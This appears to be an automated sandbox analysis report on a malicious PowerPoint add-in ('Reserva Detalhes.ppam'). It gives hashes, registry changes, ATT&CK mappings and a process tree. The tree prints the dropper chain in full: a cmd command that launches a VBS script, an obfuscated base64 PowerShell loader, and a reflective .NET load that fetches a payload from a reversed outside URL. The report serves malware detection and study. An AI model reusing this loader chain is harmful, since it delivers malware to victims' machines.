f651bda0b4fd972f48db97f7d7c57f4d66fb69f9c6a3f847a2a265d7dbe33469

General

Target

Reserva Detalhes.ppam
Size

8KB
MD5

38a0eb561cbe53efb6a6bbbaef74e480
SHA1

a006b9112485374499ecaa1d6f989d1f29a4dd6f
SHA256

f651bda0b4fd972f48db97f7d7c57f4d66fb69f9c6a3f847a2a265d7dbe33469
SHA512

b2a59cf376dc3724867d9012eebc9cfabce8657b1f0eeb5671e764c5be216b97db1a88209d2ba0f7949035185712ab87d3f464bf51adfa34d46f3cb6e1bc027c
SSDEEP

192:xrXP/sUwOwsOa0PuuSUPmttJTd4joE3N9OycExwc:dXP+No8m7JTd4d9OycExR

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	2080	2020	cmd.exe	POWERPNT.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2936 PING.EXE

pid	process
2936	PING.EXE

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Reserva Detalhes.ppam"
1⤵
- Modifies Internet Explorer settings
PID:2020

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start C:\Users\Public\document.vbs
2⤵
- Process spawned unexpected child process
PID:2080

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:2936

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\document.vbs"
3⤵
PID:1048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $DlEAp = 'J℅⚓♲BP℅⚓♲FE℅⚓♲dwBo℅⚓♲GQ℅⚓♲I℅⚓♲℅⚓♲9℅⚓♲C℅⚓♲℅⚓♲Jw℅⚓♲l℅⚓♲Gk℅⚓♲VQBZ℅⚓♲FI℅⚓♲YQ℅⚓♲l℅⚓♲Cc℅⚓♲Ow℅⚓♲k℅⚓♲GU℅⚓♲d℅⚓♲Bh℅⚓♲Hc℅⚓♲Rg℅⚓♲g℅⚓♲D0℅⚓♲I℅⚓♲℅⚓♲n℅⚓♲CU℅⚓♲egBL℅⚓♲EE℅⚓♲QQBZ℅⚓♲CU℅⚓♲Jw℅⚓♲7℅⚓♲Fs℅⚓♲QgB5℅⚓♲HQ℅⚓♲ZQBb℅⚓♲F0℅⚓♲XQ℅⚓♲g℅⚓♲CQ℅⚓♲T℅⚓♲Bi℅⚓♲Fk℅⚓♲awBW℅⚓♲C℅⚓♲℅⚓♲PQ℅⚓♲g℅⚓♲Fs℅⚓♲UwB5℅⚓♲HM℅⚓♲d℅⚓♲Bl℅⚓♲G0℅⚓♲LgBD℅⚓♲G8℅⚓♲bgB2℅⚓♲GU℅⚓♲cgB0℅⚓♲F0℅⚓♲Og℅⚓♲6℅⚓♲EY℅⚓♲cgBv℅⚓♲G0℅⚓♲QgBh℅⚓♲HM℅⚓♲ZQ℅⚓♲2℅⚓♲DQ℅⚓♲UwB0℅⚓♲HI℅⚓♲aQBu℅⚓♲Gc℅⚓♲K℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲ZQB0℅⚓♲GE℅⚓♲dwBG℅⚓♲C4℅⚓♲UgBl℅⚓♲H℅⚓♲℅⚓♲b℅⚓♲Bh℅⚓♲GM℅⚓♲ZQ℅⚓♲o℅⚓♲Cc℅⚓♲kyE6℅⚓♲JMhJw℅⚓♲s℅⚓♲C℅⚓♲℅⚓♲JwBB℅⚓♲Cc℅⚓♲KQ℅⚓♲g℅⚓♲Ck℅⚓♲OwBb℅⚓♲FM℅⚓♲eQBz℅⚓♲HQ℅⚓♲ZQBt℅⚓♲C4℅⚓♲QQBw℅⚓♲H℅⚓♲℅⚓♲R℅⚓♲Bv℅⚓♲G0℅⚓♲YQBp℅⚓♲G4℅⚓♲XQ℅⚓♲6℅⚓♲Do℅⚓♲QwB1℅⚓♲HI℅⚓♲cgBl℅⚓♲G4℅⚓♲d℅⚓♲BE℅⚓♲G8℅⚓♲bQBh℅⚓♲Gk℅⚓♲bg℅⚓♲u℅⚓♲Ew℅⚓♲bwBh℅⚓♲GQ℅⚓♲K℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲T℅⚓♲Bi℅⚓♲Fk℅⚓♲awBW℅⚓♲C℅⚓♲℅⚓♲KQ℅⚓♲u℅⚓♲Ec℅⚓♲ZQB0℅⚓♲FQ℅⚓♲eQBw℅⚓♲GU℅⚓♲K℅⚓♲℅⚓♲n℅⚓♲EM℅⚓♲b℅⚓♲Bh℅⚓♲HM℅⚓♲cwBM℅⚓♲Gk℅⚓♲YgBy℅⚓♲GE℅⚓♲cgB5℅⚓♲DM℅⚓♲LgBD℅⚓♲Gw℅⚓♲YQBz℅⚓♲HM℅⚓♲MQ℅⚓♲n℅⚓♲Ck℅⚓♲LgBH℅⚓♲GU℅⚓♲d℅⚓♲BN℅⚓♲GU℅⚓♲d℅⚓♲Bo℅⚓♲G8℅⚓♲Z℅⚓♲℅⚓♲o℅⚓♲Cc℅⚓♲c℅⚓♲By℅⚓♲EY℅⚓♲VgBJ℅⚓♲Cc℅⚓♲KQ℅⚓♲u℅⚓♲Ek℅⚓♲bgB2℅⚓♲G8℅⚓♲awBl℅⚓♲Cg℅⚓♲J℅⚓♲Bu℅⚓♲HU℅⚓♲b℅⚓♲Bs℅⚓♲Cw℅⚓♲I℅⚓♲Bb℅⚓♲G8℅⚓♲YgBq℅⚓♲GU℅⚓♲YwB0℅⚓♲Fs℅⚓♲XQBd℅⚓♲C℅⚓♲℅⚓♲K℅⚓♲℅⚓♲n℅⚓♲GY℅⚓♲Yg℅⚓♲5℅⚓♲DE℅⚓♲NQBh℅⚓♲Dc℅⚓♲NwBh℅⚓♲GY℅⚓♲Z℅⚓♲℅⚓♲1℅⚓♲DY℅⚓♲OQBm℅⚓♲Dg℅⚓♲Mw℅⚓♲3℅⚓♲GQ℅⚓♲M℅⚓♲℅⚓♲z℅⚓♲DE℅⚓♲Yg℅⚓♲w℅⚓♲GE℅⚓♲MQBk℅⚓♲GY℅⚓♲Mg℅⚓♲3℅⚓♲Dk℅⚓♲M℅⚓♲℅⚓♲u℅⚓♲F℅⚓♲℅⚓♲ZwBz℅⚓♲DQ℅⚓♲bwBB℅⚓♲Dk℅⚓♲Mg℅⚓♲v℅⚓♲F8℅⚓♲QgBG℅⚓♲D℅⚓♲℅⚓♲N℅⚓♲BU℅⚓♲F8℅⚓♲Xw℅⚓♲v℅⚓♲GQ℅⚓♲YQBv℅⚓♲Gw℅⚓♲bgB3℅⚓♲G8℅⚓♲R℅⚓♲B0℅⚓♲GM℅⚓♲ZQBy℅⚓♲Gk℅⚓♲Z℅⚓♲℅⚓♲v℅⚓♲GI℅⚓♲ZQB3℅⚓♲C8℅⚓♲bQBv℅⚓♲GM℅⚓♲LgBj℅⚓♲G4℅⚓♲eQBz℅⚓♲DQ℅⚓♲LgB3℅⚓♲Hc℅⚓♲dw℅⚓♲v℅⚓♲C8℅⚓♲OgBz℅⚓♲H℅⚓♲℅⚓♲d℅⚓♲B0℅⚓♲Gg℅⚓♲Jw℅⚓♲g℅⚓♲Cw℅⚓♲I℅⚓♲℅⚓♲k℅⚓♲E8℅⚓♲UQB3℅⚓♲Gg℅⚓♲Z℅⚓♲℅⚓♲g℅⚓♲Cw℅⚓♲I℅⚓♲℅⚓♲n℅⚓♲FQ℅⚓♲cgB1℅⚓♲GU℅⚓♲Jw℅⚓♲g℅⚓♲Ck℅⚓♲I℅⚓♲℅⚓♲p℅⚓♲℅⚓♲==';$blPuG = $DlEAp.replace('℅⚓♲','A') ;$xxjOR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $blPuG ) ).replace('%zKAAY%','').replace('%iUYRa%','C:\Users\Public\document.vbs');powershell $xxjOR
4⤵
PID:2592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$OQwhd = 'C:\Users\Public\document.vbs';$etawF = '';[Byte[]] $LbYkV = [System.Convert]::FromBase64String( $etawF.Replace('↓:↓', 'A') );[System.AppDomain]::CurrentDomain.Load( $LbYkV ).GetType('ClassLibrary3.Class1').GetMethod('prFVI').Invoke($null, [object[]] ('fb915a77afd569f837d031b0a1df2790.Pgs4oA92/_BF04T__/daolnwoDtcerid/bew/moc.cnys4.www//:sptth' , $OQwhd , 'True' ) )"
5⤵
PID:1288

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab12E8.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar14BF.tmp
Filesize
111KB

MD5
b537a629c12ab93b5155f29688cad0d1

SHA1
6ae7aa333b5b2c84f7787f2ede5a0184006cf80f

SHA256
d01fae72a883a30822eea589a5bc1cc14809ad4a1d2de54e3c7483d959386c72

SHA512
0df911df226ded41da739075275c384074c8da555b9d196475efe615157767fcde16c8d32761e3468a4c7c0e8d336eb7f98072459a0adecfb6641042ccc55763

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ELHS8URVW3O1GI7BA2LT.temp
Filesize
7KB

MD5
42b39b050348bd5cf8901dcca0c84077

SHA1
6c0316edce94ba6a7a1f1ef3d9304a286e996ee4

SHA256
ac90be4d49e16e4bc4f86bdb978d95b4369451068fa5ad3cb772ebf0ca9bfae0

SHA512
d38c8205c49253a8eda0b13a537c7143b4ec4362705466d0688179cd3152843833925dfbb76375d4d411836fd0ec24c074429651860643a578da52dd78e9052b

Download Submit
C:\Users\Public\document.vbs
Filesize
9KB

MD5
3aa9c20e5838b29d37649b056bebc1cd

SHA1
58f54273b5473cd99f48feefd4f1c1009921b4eb

SHA256
b3f0dfae42532575abed30cc0e4fecacefea1724c841ecf2f15817510a15731c

SHA512
88efd70c88cb2b787a3cd880b1b9fbaf216c96c6fa4d26915080804a9c134cafc5ec519b2442cc15f9794ee23f872e132014a0199680ca3d2c93a602453687fe

Download Submit
memory/1288-79-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/1288-83-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/1288-80-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/1288-81-0x0000000002820000-0x0000000002860000-memory.dmp

Filesize
256KB

Download
memory/1288-82-0x0000000002820000-0x0000000002860000-memory.dmp

Filesize
256KB

Download
memory/2020-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2020-51-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2020-8-0x0000000005540000-0x0000000005640000-memory.dmp

Filesize
1024KB

Download
memory/2020-2-0x0000000072A4D000-0x0000000072A58000-memory.dmp

Filesize
44KB

Download
memory/2020-0-0x000000002D521000-0x000000002D522000-memory.dmp

Filesize
4KB

Download
memory/2020-53-0x0000000005540000-0x0000000005640000-memory.dmp

Filesize
1024KB

Download
memory/2020-52-0x0000000072A4D000-0x0000000072A58000-memory.dmp

Filesize
44KB

Download
memory/2020-7-0x0000000005540000-0x0000000005640000-memory.dmp

Filesize
1024KB

Download
memory/2592-70-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/2592-71-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2592-73-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2592-72-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2592-69-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/2592-84-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing